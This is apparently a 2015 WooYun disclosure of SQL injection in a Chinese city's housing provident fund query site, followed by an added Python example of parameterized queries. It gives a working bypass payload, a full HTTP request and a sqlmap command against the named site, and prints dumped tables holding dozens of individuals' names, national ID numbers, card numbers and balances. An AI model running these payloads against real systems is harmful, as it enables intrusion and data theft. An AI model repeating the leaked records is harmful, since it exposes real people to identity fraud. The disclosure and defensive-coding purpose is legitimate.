Vulnerability Summary

Defect ID: wooyun-2015-0126039

Title: SQL injection vulnerability in a municipal Housing Provident Fund Management Center

Related vendor: CNCERT (National Internet Emergency Center)

Author: 毛毛虫

Submitted: 2015-07-13 08:53

Fixed: 2015-08-31 16:16

Published: 2015-08-31 16:16

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability Details

Disclosure status:

2015-07-13: Details sent to the vendor; awaiting vendor handling
2015-07-17: Vendor confirmed; details visible to the vendor only
2015-07-27: Details disclosed to core white hats and domain experts
2015-08-06: Details disclosed to regular white hats
2015-08-16: Details disclosed to intern white hats
2015-08-31: Details disclosed to the public

Brief description:

The Suqian Housing Provident Fund Management Center has a SQL injection vulnerability: a user's provident fund balance can be queried without knowing their ID number or savings card number. Very careless; it leaks a large amount of users' housing provident fund information!

Detailed description:

<code area 1>
http://www.sqzfgjj.com/Query_Sspersons.aspx
In the "ID number" field, enter 'or'1'='1
In the "savings card number" field, enter 'or'1'='1

公积金余额.jpg (screenshot: provident fund balance)


<code area 2>
POST /Query_Sspersons.aspx HTTP/1.1
Host: www.sqzfgjj.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.sqzfgjj.com/Query_Sspersons.aspx
Cookie: ASP.NET_SessionId=cn02jdzhek4dkt55zjz0a2qf
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 210
__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEzODI5NTg4MDdkZPYKRswPZ68G0Ma2G7JXT9fqC2ZT&ZLTextBox_spidno=1111111111111&ZLTextBox_spcard=22222222222222&Button_Query=++%E6%8F%90%E4%BA%A4++
Dumping the database with sqlmap:
sqlmap.py -u "http://www.sqzfgjj.com/Query_Sspersons.aspx" --data="__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEzODI5NTg4MDcPZBYCAgIPZBYYAgMPDxYCHgRUZXh0BQExZGQCCQ8PFgIfAAUBMWRkAhMPDxYCHwBlZGQCFw8PFgIfAGVkZAIbDw8WAh8AZWRkAh8PDxYCHwBlZGQCIw8PFgIfAGVkZAInDw8WAh8AZWRkAisPDxYCHwBlZGQCLw8PFgIfAGVkZAIzDw8WAh8AZWRkAjcPDxYCHwBlZGRkb9ruy06%2BKd0YfAPSMEeqDKrSLCM%3D&ZLTextBox_spidno=1&ZLTextBox_spcard=1&Button_Query=++%E6%8F%90%E4%BA%A4++" --risk=3 -v3 --dbs --tables
This exposes operating system, database, IIS and ASP information.

暴漏系统信息.jpg (screenshot: exposed system information)

Proof of vulnerability:

(1) Database information
Database: tempdb
[2 tables]
+--------------------------------------------+
| sysconstraints |
| syssegments |
+--------------------------------------------+
Database: ABIS_SQZFGJJ
[16 tables]
+--------------------------------------------+
| dtproperties |
| sysconstraints |
| syssegments |
| t_sys_Admin |
| t_sys_Branch |
| t_sys_Data |
| t_sys_Group |
| t_sys_Log |
| t_sys_Menu |
| t_sys_UserOnline |
| t_sys_UserOnline |
| t_sys_r_GroupMenu |
| t_sys_r_UserGroup |
| t_user_house |
| t_user_pmlsht |
| t_user_sspersons |
+--------------------------------------------+
Database: msdb
[82 tables]
+--------------------------------------------+
| RTblClassDefs |
| RTblDBMProps |
| RTblDBXProps |
| RTblDTMProps |
| RTblDTSProps |
| RTblDatabaseVersion |
| RTblEQMProps |
| RTblEnumerationDef |
| RTblEnumerationValueDef |
| RTblGENProps |
| RTblIfaceDefs |
| RTblIfaceHier |
| RTblIfaceMem |
| RTblMDSProps |
| RTblNamedObj |
| RTblOLPProps |
| RTblParameterDef |
| RTblPropDefs |
| RTblProps |
| RTblRelColDefs |
| RTblRelshipDefs |
| RTblRelshipProps |
| RTblRelships |
| RTblSIMProps |
| RTblScriptDefs |
| RTblSites |
| RTblSumInfo |
| RTblTFMProps |
| RTblTypeInfo |
| RTblTypeLibs |
| RTblUMLProps |
| RTblUMXProps |
| RTblVersionAdminInfo |
| RTblVersions |
| RTblWorkspaceItems |
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_databases |
| log_shipping_monitor |
| log_shipping_plan_databases |
| log_shipping_plan_history |
| log_shipping_plans |
| log_shipping_primaries |
| log_shipping_secondaries |
| logmarkhistory |
| mswebtasks |
| restorefilegroup |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| sysalerts |
| syscachedcredentials |
| syscategories |
| sysconstraints |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtspackagelog |
| sysdtspackages |
| sysdtssteplog |
| sysdtstasklog |
| sysjobhistory |
| sysjobs_view |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobsteps |
| sysnotifications |
| sysoperators |
| syssegments |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers_view |
| systargetservers_view |
| systaskids |
| systasks_view |
| systasks_view |
+--------------------------------------------+
Database: pubs
[14 tables]
+--------------------------------------------+
| authors |
| discounts |
| employee |
| jobs |
| pub_info |
| publishers |
| roysched |
| sales |
| stores |
| sysconstraints |
| syssegments |
| titleauthor |
| titles |
| titleview |
+--------------------------------------------+
Database: master
[36 tables]
+--------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| MSreplication_options |
| spt_datatype_info_ext |
| spt_datatype_info_ext |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_provider_types |
| spt_server_info |
| spt_values |
| sysconstraints |
| syslogins |
| sysoledbusers |
| sysopentapes |
| sysremotelogins |
| syssegments |
+--------------------------------------------+
Database: model
[2 tables]
+--------------------------------------------+
| sysconstraints |
| syssegments |
+--------------------------------------------+
Database: Northwind
[31 tables]
+--------------------------------------------+
| Categories |
| CustomerCustomerDemo |
| CustomerDemographics |
| Customers |
| EmployeeTerritories |
| Employees |
| Invoices |
| Region |
| Shippers |
| Suppliers |
| Territories |
| Alphabetical list of products |
| Category Sales for 1997 |
| Current Product List |
| Customer and Suppliers by City |
| Order Details Extended |
| Order Details Extended |
| Order Subtotals |
| Orders Qry |
| Orders Qry |
| Product Sales for 1997 |
| Products Above Average Price |
| Products Above Average Price |
| Products by Category |
| Quarterly Orders |
| Sales Totals by Amount |
| Sales by Category |
| Summary of Sales by Quarter |
| Summary of Sales by Year |
| sysconstraints |
| syssegments |
+--------------------------------------------+
(2) Row counts of the tables in the databases
Database: ABIS_SQZFGJJ
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| dbo.t_user_sspersons | 71961 |
| dbo.t_user_pmlsht | 8645 |
| dbo.t_sys_Log | 401 |
| dbo.sysconstraints | 27 |
| dbo.t_user_house | 26 |
| dbo.t_sys_Data | 22 |
| dbo.t_sys_Menu | 15 |
| dbo.t_sys_r_GroupMenu | 9 |
| dbo.t_sys_Branch | 7 |
| dbo.syssegments | 3 |
| dbo.t_sys_UserOnline | 3 |
| dbo.t_sys_UserOnline | 3 |
| dbo.t_sys_Admin | 1 |
| dbo.t_sys_Group | 1 |
| dbo.t_sys_r_UserGroup | 1 |
+-----------------------+---------+
Database: Northwind
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.[Order Details Extended] | 2155 |
| dbo.[Order Details Extended] | 2155 |
| dbo.Invoices | 2155 |
| dbo.[Order Subtotals] | 830 |
| dbo.[Orders Qry] | 830 |
| dbo.[Orders Qry] | 830 |
| dbo.[Summary of Sales by Quarter] | 809 |
| dbo.[Summary of Sales by Year] | 809 |
| dbo.[Customer and Suppliers by City] | 120 |
| dbo.Customers | 91 |
| dbo.[Quarterly Orders] | 86 |
| dbo.[Product Sales for 1997] | 77 |
| dbo.[Sales by Category] | 77 |
| dbo.[Alphabetical list of products] | 69 |
| dbo.[Current Product List] | 69 |
| dbo.[Products by Category] | 69 |
| dbo.[Sales Totals by Amount] | 66 |
| dbo.Territories | 53 |
| dbo.EmployeeTerritories | 49 |
| dbo.sysconstraints | 43 |
| dbo.Suppliers | 29 |
| dbo.[Products Above Average Price] | 25 |
| dbo.[Products Above Average Price] | 25 |
| dbo.Employees | 9 |
| dbo.[Category Sales for 1997] | 8 |
| dbo.Categories | 8 |
| dbo.Region | 4 |
| dbo.Shippers | 3 |
| dbo.syssegments | 3 |
+--------------------------------------+---------+
(3) Table contents, exposing all kinds of user information (name, ID number, payment card number, contribution amount, remaining balance, payment date, contribution ratio, etc.).
Database: ABIS_SQZFGJJ
Table: t_user_sspersons
[41 entries]
+--------------------------------------+--------------------+--------+--------+-
----------+-----------+----------+--------+--------+---------+---------+
| id | spidno | spjym | spname |
spcode | spmend | spcard | sncode | spjcbl | spsingl | spmfact |
+--------------------------------------+--------------------+--------+--------+-
----------+-----------+----------+--------+--------+---------+---------+
| 00036303-F843-4B04-86FE-17DD77564434 | 320823197309086231 | 201309 | 杜学飞
| 002977022 | 107570.63 | 00022701 | 004514 | 12.00 | 12.00 | 1962.00 |
| 0003EBBA-48EC-4850-A2CD-C476FDF2DE01 | 321302198104050813 | 201303 | 张雷
| 010201092 | 25324.21 | 00033773 | 006757 | 12.00 | 12.00 | 560.00 |
| 0005484D-5706-4978-863E-EC140A291412 | 32082319531117221X | 201309 | 周立方
| 013076904 | 32450.42 | 00065220 | 021539 | 9.00 | 9.00 | 536.00 |
| 0005739D-E13D-4344-8E7B-81359C24576F | 320825197905243910 | 201309 | 付爱兵
| 018765636 | 13239.03 | 00089751 | 014639 | 12.00 | 12.00 | 428.00 |
| 0005D278-3BCF-4981-97CD-37A7A0011056 | 320823196506285067 | 201309 | 范乃云
| 013868387 | 29387.49 | 00073865 | 022382 | 9.00 | 9.00 | 492.00 |
| 00078BE8-02D9-4CDF-82E5-863FA6B58563 | 320881640906501 | 201306 | 陆裕德
| 012207575 | 57030.83 | 00019354 | 019888 | 12.00 | 12.00 | 1254.00 |
| 0007AD85-5A8B-49F8-BFA9-E50142E6C1CC | 320881197912220830 | 201308 | 王东
| 017896269 | 15454.91 | 00082255 | 024817 | 8.00 | 8.00 | 384.00 |
| 0007E36B-5BC1-4873-94F6-AB5B4C105280 | 320105198210031824 | 201309 | 胡乃康
| 013897827 | 11443.11 | 00070914 | 022413 | 9.00 | 9.00 | 434.00 |
| 000A5556-973D-4970-9D90-086FE818125B | 320827196402074455 | 201212 | 何业军
| 015543539 | 5173.86 | 00035824 | 024344 | 9.00 | 9.00 | 412.00 |
| 000AA1EB-94EC-4762-96A6-90F0D071B712 | 320881197710230416 | 201309 | 唐威
| 011528035 | 23136.22 | 00015708 | 016926 | 12.00 | 12.00 | 1126.00 |
| 000ACB8C-AD1C-4FBC-B901-16EFBFE72882 | 321322198212130701 | 201309 | 廉露
| 015676330 | 26290.16 | 00103961 | 004396 | 12.00 | 12.00 | 1918.00 |
| 000AEBD5-5B32-4C86-8043-1EBDD2E11D80 | 320823196303020026 | 201309 | 朱剑
| 003297620 | 69648.53 | 00024860 | 005063 | 12.00 | 12.00 | 2338.00 |
| 000AFBC3-6FF0-4047-8D46-A4BCA547DF5F | 360426198107010617 | 201308 | 蒋振国
| 017048899 | 13899.27 | 00081783 | 027409 | 12.00 | 12.00 | 380.00 |
| 000E7616-5654-46DA-B859-0F5E30A4D160 | 321302197402090819 | 201309 | 王志超
| 002077383 | 52578.56 | 00054183 | 002959 | 12.00 | 12.00 | 1028.00 |
| 000EF42C-0989-4704-9815-07299EA2DA02 | 321302197105160614 | 201309 | 陆辉
| 009700203 | 24979.18 | 00012936 | 014871 | 9.00 | 9.00 | 352.00 |
| 000FD0CF-D2C4-474D-8669-B0D5989D52CE | 320823196608139730 | 201309 | 窦道奇
| 000138931 | 77603.15 | 00013524 | 000274 | 12.00 | 12.00 | 1530.00 |
| 0011B4CA-8EB8-43D5-A2D7-92D9745675AA | 321322198309120067 | 201306 | 华冬云
| 010406015 | 24893.41 | 00052951 | 004822 | 12.00 | 12.00 | 839.52 |
| 0011C425-F5E9-4F44-903D-19D3CC5324D0 | 320825196609143363 | 201308 | 孟召芝
| 005043401 | 37020.58 | 00027458 | 007375 | 12.00 | 12.00 | 632.00 |
| 00124BB9-C899-4212-A50B-A2EAB2294698 | 321322196502050014 | 201309 | 徐克农
| 012852956 | 29386.81 | 00078182 | 021262 | 9.00 | 9.00 | 492.00 |
| 00133D60-C6D1-45C3-A06F-5F12C67221EF | 320819197403020410 | 201309 | 张刚
| 009032795 | 19408.58 | 00014071 | 000274 | 12.00 | 12.00 | 1200.00 |
| 0013AD1C-AD49-4510-BD19-D6F684917834 | 321322198502102629 | 201308 | 周晗
| 016212619 | 22944.62 | 00099939 | 016604 | 12.00 | 12.00 | 760.00 |
| 0014771A-D388-407D-9463-A1B5FF66A6DC | 320825750814571 | 201308 | 于之才
| 009895136 | 5101.53 | 00034751 | 007154 | 12.00 | 12.00 | 592.00 |
| 00148831-B7B6-4CF0-8A22-519CF9D1D442 | 320823197106010229 | 201307 | 刘敏
| 003035581 | 13818.42 | 00020148 | 004546 | 10.00 | 10.00 | 416.00 |
| 0015138F-2056-4C83-AF57-AB755980F9AE | 320827591007021 | 200812 | 马跃
| 000029314 | 37781.67 | 00012285 | 000088 | 9.00 | 9.00 | 348.00 |
| 0015848A-2F8E-4986-83FD-9A258A38C6D3 | 320823821128041 | 201309 | 肖伟伟
| 010608110 | 27981.55 | 00014324 | 000088 | 12.00 | 12.00 | 610.00 |
| 0016771D-1E51-4118-80E7-CD579938D5B2 | 321302198209090854 | 201303 | 殷文明
| 012151559 | 60515.24 | 00016639 | 000111 | 12.00 | 12.00 | 1541.00 |
| 0016CE20-67CA-427D-9A55-53540C0B2739 | 320825196312042828 | 201308 | 刘玲
| 011372412 | 26256.43 | 00062495 | 018127 | 12.00 | 12.00 | 486.00 |
| 00170AC5-2CD8-4AC5-BF3E-C0C7736E7116 | 360103197611111913 | 201309 | 陶友珍
| 017423396 | 30988.05 | 00100515 | 026587 | 12.00 | 12.00 | 1022.00 |
| 001859D3-C5E6-49CA-AD20-483B0D79203B | 32132419850713362X | 201308 | 严慧慧
| 016207176 | 23261.00 | 00099884 | 016604 | 12.00 | 12.00 | 786.00 |
| 0019AD56-4AF7-4EE4-9594-E1B6E51DD905 | 321321196705042253 | 201309 | 蔡柏
| 011003636 | 35315.04 | 00014779 | 017938 | 8.00 | 8.00 | 626.00 |
| 0019B7EB-BA15-4503-9D11-97CA41CD825D | 320819196908070849 | 201309 | 陈巧燕
| 001447085 | 47920.97 | 00004282 | 001822 | 12.00 | 12.00 | 994.00 |
| 001ACBB9-8F56-4C40-8ECC-A12CE17BD9B6 | 220183198008023017 | 201309 | 刘大勇
| 020571322 | 33858.71 | 00085537 | 027216 | 10.00 | 10.00 | 2000.00 |
| 001B1C9F-5E9C-4B1E-8E7C-FC9D04E62FEC | 320819570430081 | 201309 | 王文成
| 001731684 | 28080.62 | 00007646 | 002411 | 12.00 | 12.00 | 1326.00 |
| 001B7575-F68D-48FD-B25E-1907B981603E | 320823197311070255 | 201309 | 黄兴刚
| 001756264 | 35682.60 | 00004610 | 002425 | 12.00 | 12.00 | 1267.00 |
| 001BAB84-6D04-4F1D-B846-552938EF99D0 | 320824721203001 | 201309 | 王波
| 005931563 | 30350.54 | 00046999 | 009097 | 9.00 | 9.00 | 1086.00 |
| 001C0ED2-0355-4EFB-91CE-A74E58C39FCC | 320825195709262517 | 201308 | 仓业林
| 011408612 | 27204.77 | 00062254 | 018127 | 12.00 | 12.00 | 486.00 |
| 001C534A-ABDF-4DCD-AD74-A23AB06E17F5 | 320825197403162563 | 201309 | 王学林
| 019187930 | 34998.24 | 00095431 | 027216 | 10.00 | 10.00 | 1518.00 |
| 001CA97E-B4C2-4BE5-B47F-E264F825C2DE | 320881198010211630 | 201306 | 杨军
| 018375187 | 6629.65 | 00105821 | 027396 | 5.00 | 5.00 | 180.00 |
| 001E3CDD-1E9C-429C-A803-E8E411766209 | 320881701125004 | 201309 | 王玉
| 015611397 | 32390.58 | 00019925 | 003096 | 12.00 | 12.00 | 1354.00 |
| 001E40A9-0E20-45E2-B4AA-8845D81CE731 | 321302198705030826 | 201011 | 于柳
| 018564820 | 686.53 | 00082563 | 018127 | 9.00 | 9.00 | 162.00 |
| 0020B017-D8A1-4D59-95BF-BF8FD833A242 | 32132319831227002X | 201309 | 冯君
| 019186036 | 23593.21 | 00094663 | 003573 | 12.00 | 12.00 | 976.00 |
+--------------------------------------+--------------------+--------+--------+-
----------+-----------+----------+--------+--------+---------+---------+
Database: Northwind
Table: Shippers
[3 entries]
+-----------+----------------+------------------+
| ShipperID | Phone | CompanyName |
+-----------+----------------+------------------+
| 3 | (503) 555-9931 | Federal Shipping |
| 1 | (503) 555-9831 | Speedy Express |
| 2 | (503) 555-3199 | United Package |
+-----------+----------------+------------------+
(4) There are more than 70,000 user records; only a few were dumped, which is enough to serve as a warning. I hope the management center takes this seriously.

Remediation:

Fix the SQL injection vulnerability and harden the system's security.
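The root cause behind a `'or'1'='1` bypass like the one above is a query built by string concatenation, and the fix the remediation line calls for is to bind the form values as parameters instead. The following Python/SQLite example is added here to show both sides; it is not code from the report or from the site. The table and column names (`t_user_sspersons`, `spidno`, `spcard`, `spname`, `spmend`) are taken from the dump above, the rows are constructed, and the ID-number format check is an assumed defence-in-depth layer, not something the page describes.

```python
import re
import sqlite3

# Constructed sample rows standing in for the fund-balance table; the column
# names come from the report's dump, the values are made up for this example.
SAMPLE_ROWS = [
    ("320800199001010011", "00000001", "Person A", 1000.00),
    ("320800199002020022", "00000002", "Person B", 2000.00),
    ("32080019900303003X", "00000003", "Person C", 3000.00),
]

# The payload the report describes, entered into both form fields.
INJECTION_PAYLOAD = "'or'1'='1"


def make_db():
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE t_user_sspersons "
        "(spidno TEXT, spcard TEXT, spname TEXT, spmend REAL)"
    )
    conn.executemany("INSERT INTO t_user_sspersons VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def query_vulnerable(conn, idno, card):
    """Builds the WHERE clause by string concatenation: user text becomes SQL.
    With the payload in both fields the clause reads
    spidno=''or'1'='1' AND spcard=''or'1'='1', which is true for every row."""
    sql = (
        "SELECT spname, spmend FROM t_user_sspersons "
        "WHERE spidno='" + idno + "' AND spcard='" + card + "'"
    )
    return conn.execute(sql).fetchall()


def query_parameterized(conn, idno, card):
    """Same lookup with bound parameters: the values travel separately from
    the SQL text, so quotes inside them are data and cannot alter the query."""
    sql = "SELECT spname, spmend FROM t_user_sspersons WHERE spidno=? AND spcard=?"
    return conn.execute(sql, (idno, card)).fetchall()


# Assumed format checks (not from the page): a PRC ID number is 15 digits or
# 17 digits plus a check character 0-9/X; a card number here is all digits.
_IDNO_RE = re.compile(r"^(\d{15}|\d{17}[\dX])$")
_CARD_RE = re.compile(r"^\d{6,20}$")


def query_hardened(conn, idno, card):
    """Defence in depth: reject input that cannot be a valid ID/card number
    before it reaches the database, then run the parameterized query."""
    if not _IDNO_RE.match(idno) or not _CARD_RE.match(card):
        return []
    return query_parameterized(conn, idno, card)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", query_vulnerable(db, INJECTION_PAYLOAD, INJECTION_PAYLOAD))
    print("parameterized:", query_parameterized(db, INJECTION_PAYLOAD, INJECTION_PAYLOAD))
    print("hardened (valid lookup):", query_hardened(db, "320800199001010011", "00000001"))
```

Running it shows the concatenated query returning every row for the payload, while the parameterized query returns nothing for the same input and still finds the right row for a genuine ID/card pair. The format check in front of the query is optional once parameters are bound, but it also keeps obviously malformed input out of the logs and the database.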

Copyright notice: when reposting, please credit the source: 毛毛虫@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-07-17 16:15

Vendor reply:

CNVD has confirmed and reproduced the reported issue; it has been forwarded through CNCERT to the corresponding branch center, which will coordinate handling with the organization operating the website.

Latest status:

None yet